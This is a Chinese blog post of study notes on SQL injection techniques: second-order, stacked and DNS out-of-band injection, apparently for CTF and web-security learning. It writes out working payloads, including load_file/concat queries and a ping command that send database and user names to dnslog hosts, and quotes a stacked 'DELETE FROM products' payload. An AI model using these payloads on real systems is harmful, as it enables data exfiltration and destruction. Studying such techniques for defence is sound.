第三十天:WEB攻防-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外

最新推荐文章于 2024-07-13 18:02:33 发布
最新推荐文章于 2024-07-13 18:02:33 发布
阅读量377 收藏
点赞数
分类专栏: 网络安全 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51322401/article/details/128883979
版权

有一说一,这节课我不是很懂,听的很懵逼

二次注入

SQL注入中的二次注入常见于 注册 新建 等功能点,当我们注册一个新的账号时,需要我们设置我们的 邮箱,用户名,密码。但是当我们成功注册后,登录只需要邮箱与密码即可完成登录,且进入后台用户中心后,我们也可以发现我们的用户名会被显示出来,这就是SQL注入的常见出现流程

我们在注册新的账号时,如果使用了 ‘’ “” 等符号 ,会被转义。所以我们常使用的sql注入payload 都会失去效果,但是当该payload被存入数据库在被引出使用的时候是原样输出,不会被过滤转义。这就是二次注入的原理了。

堆叠注入

堆叠注入是原本的SQL语句 select * from user where username=‘bliss’

然后我们可以通过传入payload username = 1’ ; show database()#来进行让他执行两条sql语句

植入payload的sql语句 :select * from user where username=‘1’ ; show database()# 一次执行两条语句,但是堆叠注入的实战情况下很少,条件有:存在sql注入 对 ; 不过滤 数据库支持一次执行多条sql语句

DNS外带

1.平台

http://www.dnslog.cn

http://admin.dnslog.link

http://ceye.io

2.应用场景:

解决不回显,反向连接,SQL注入,命令执行,SSRF等

SQL注入:

select load_file(concat(‘\’,(select database()),‘.7logee.dnslog.cn\aa’));

and (select load_file(concat(‘//’,(select database()),‘.69knl9.dnslog.cn/abc’)))

命令执行:

ping %USERNAME%.7logee.dnslog.cn

但是很少使用,因为无回显常常会考虑时间盲注等其他方法,使用dns注入效率不高

新奇八
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入(二次,DNSlog,堆叠等注入)
qi_SJQ_的博客
11-11 1112
加解密: 最常见的就是base64编码,url编码等等,这些都得熟悉。 比如:cookie处加解密,需要自己去还原并相应地加密payload; 二次注入: 在黑盒测试以及工具中几乎发现不了,拿到源码后代码审计的话才可以发现,因为根本不知到第一次插入什么数据才可以导致二次调用时成功注入。 可以在Less-24实战: 修改密码页面sql源码: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
第30天:WEB攻防-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
wuqingsix的博客
11-21 401
2、如利用mysql_multi_query()函数就支持多条SQL语句同时执行,实际情况中如PHP的防SQL注入机制,其使用的数据库函数为 "mysqli_query()"函数。主要原因是,堆叠注入的利用看起来很厉害但是其可能会受到 API、数据库引擎或者权限的控制。1、当用户输入恶意数据时,网站对我们输入的重要的关键字进行了转义,然后存储到数据库。数据一定是插入进去的,数据库攻击代码取出来调用 ,当人有执行查询操作时 会被触发。解决不回显,反向连接,SQL注入,命令执行,SSRF等。
day30 SQL注入&CTF&二次&堆叠&DNS带外
wanjia01的博客
11-22 718
详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL二次注入。第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容。查看数据库,已经添加成功。
sql注入之 读文件 写文件 带外 二次注入 堆叠注入
weixin_44276341的博客
02-10 529
二次解码注入 url编码 在前面加上% 比如\ 它的ascii码是92 那么92对应的16进制是5c 所以它的url是%5c php解码函数 urlcode() rawurlcode() 默认的GET和POST请求 ,php会先解码一次 例如 admin’ –> admin%27 -> admin%2527 -> admin %27 -> (转移函数) -&...
SQL注入&堆叠注入&二次注入
weixin_54882883的博客
05-18 373
知识点: 1、数据库堆叠注入 根据数据库类型决定是否支持多条语句执行 2、数据库二次注入 二次注入:插入后调用显示操作符合 堆叠注入:判断注入后直接调多条执行 DNS注入:在注入上没太大利用价值,其他还行 堆叠注入 select * from sy_guestbook where id=1;create table 表名 like 在那个库里创建 select * from sy_guestbook where id=1;create table bbb like sy_guestbook;
第76天:Python开发-内外网收集Socket&子域名&DNS1
08-03
在本文中,我们将深入探讨Python开发中的网络通信技术,特别是Socket编程、子域名查找和DNS解析,这些都是网络安全和应急响应中的重要技能。首先,我们来看看Python开发基础环境配置。 **开发基础环境配置** 一个...
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
【Java CTF夺旗:反编译、XXE与反序列化详解】 在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,Java技术经常成为关键考点,涉及到的知识点包括但不限于反编译、XXE(XML External Entity)攻击、反序列化...
knary:一个具有SlackDiscordMS TeamsLark&Pushover支持的简单HTTP(S)和DNS Canary机器人
04-29
他们可以帮助查找区域以探查RFI或SSRF漏洞,披露以前未知的服务器,提供MitM设备的证据或仅宣布有人与您的服务器进行交互。 防御者还使用金丝雀作为绊网,可以通过让攻击者宣布自己来警告网络中的攻击者。 为防御...
CTF Attack & Defense线下攻防赛比赛技巧.pdf
01-15
CTF Attack & Defense线下攻防赛比赛技巧》是一份深度探讨网络安全竞赛策略的重要资源,主要涉及CTF(Capture The Flag)比赛中的攻击与防守技巧。这类比赛是网络安全领域的一种实战训练,旨在提升参赛者在实际...
DNS中的SQL注入攻击
netsec_steven的博客
10-09 1914
0x00 前言 原文地址:http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf 原文作者: Miroslav tampar 本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。 开源SQL注入工具—SqlMap现在已
数据库外带——DNS注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-14 1148
Mysql注入——DNS注入 靶场地址 原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志 1.,我们看到靶场,首先尝试最简单的get传参,注入 它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试 页面正常,继续
CTFweb篇-SQL注入(三)
weixin_44597701的博客
08-15 427
堆叠注入 什么是堆叠注入 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,**可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。**例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为
sql_mode详解(超详细,亲测有效)
热门推荐
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到关于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 716
SQL注入——DNSlog注入
30、WEB攻防——通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
qq_55202378的博客
01-21 493
假如在注册用户的时候,需要填用户名、邮箱和密码,登录使用邮箱和密码,登陆上去后会显示用户名,后台为什么知道你的用户名,就可能是使用SQL语句,通过你的邮箱和密码查询到用户名。假如用户名是SQL语句,会在插入的时候就执行SQL语句,然后显示。这就是二次注入的基本原理。应用程序:解决不回显、反向连接(DNS协议一般不被禁用)、SQL注入、命令执行、SSRF等。这个函数),某k真辣鸡,整这么些花里胡哨的。填写表单,保存数据默认会更新所有数据。在mysql中,支持16进制编码。
SQL注入之宽字节注入、堆叠注入、二次注入
m0_61506558的博客
09-17 1151
渗透的学习,必须要心无旁骛,通过靶场实战不断总结经验,vulnhub、hackthebox......这些靶场,如果有一个知识点没有掌握就会卡着动不了,之前整理sql注入的文章有点杂,主要原因是此部分内容较多。(一)宽字节注入如今有很多人在编码的时候,大多数人对程序的编码都使用unicode编码,网站都使用utf-8来一个统一国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。
ctfSQL注入(post)
YkingH的博客
07-07 1096
ctfSQL注入(post) SQL注入漏洞介绍 ​ sql注入攻击指用用户构建特殊的输入作为参数传入web应用程序,通过执行sql语句,而执行攻击者所要的操作,主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 ​ 任何一个用户可以输入的位置都可以是注入点。比如url中,以及http报文中,post传递的参数 1.信息探测 扫描主机开放的全部端口 nmap -T4 -p -靶场IP 快速扫描主机全部信息 nmap -T4 -A -v 靶场IP 探测敏感信息 nikto -host ht
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
最新发布
cao919的专栏Net
07-13 734
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值